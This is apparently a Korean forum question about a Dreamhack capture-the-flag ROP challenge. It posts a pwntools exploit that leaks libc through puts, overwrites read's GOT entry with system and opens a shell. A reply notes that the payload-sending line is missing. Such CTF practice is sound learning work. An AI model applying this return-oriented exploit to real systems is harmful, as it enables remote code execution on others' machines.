rop 문제 다시풀어보고잇는디
from pwn import *
p = remote("host3.dreamhack.games",11394)
e = ELF("./basic_rop_x64")
libc = ELF("libc.so.6")
puts_plt=e.plt['puts']
read_plt=e.plt['read']
read_got=e.got['read']
pop_rdi=0x0000000000400883
pop_rsi_pop_r15=0x0000000000400881
payload=b'A'*48
payload+=p64(pop_rdi)+p64(read_got)
payload+=p64(puts_plt)
payload+=p64(pop_rdi)+p64(0)
payload+=p64(pop_rsi_pop_r15)+p64(read_got)+p64(0)
payload+=p64(read_plt)
payload+=p64(pop_rdi)
payload+=p64(read_got+0x8)
payload+=p64(read_plt)
read = u64(p.recvn(6)+b"\x00"*2)
lb=read-libc.symbols["read"]
system=lb+libc.symbols["system"]
p.send(p64(system)+b"/bin/sh\x00")
p.interactive()
저 read = u64(p.recvn(6)+b"\x00"*2)
부분이 오류떠요 왜그런걸가유ㅜ
페이로드 상 값을 전달한 뒤 read = u64(p.recvn(6)+b"\x00"*2) 를 받으셔야하는데 한 줄이 빠진 것 같네요 ㅎㅎ
지식을 나누고 포인트를 획득해보세요.
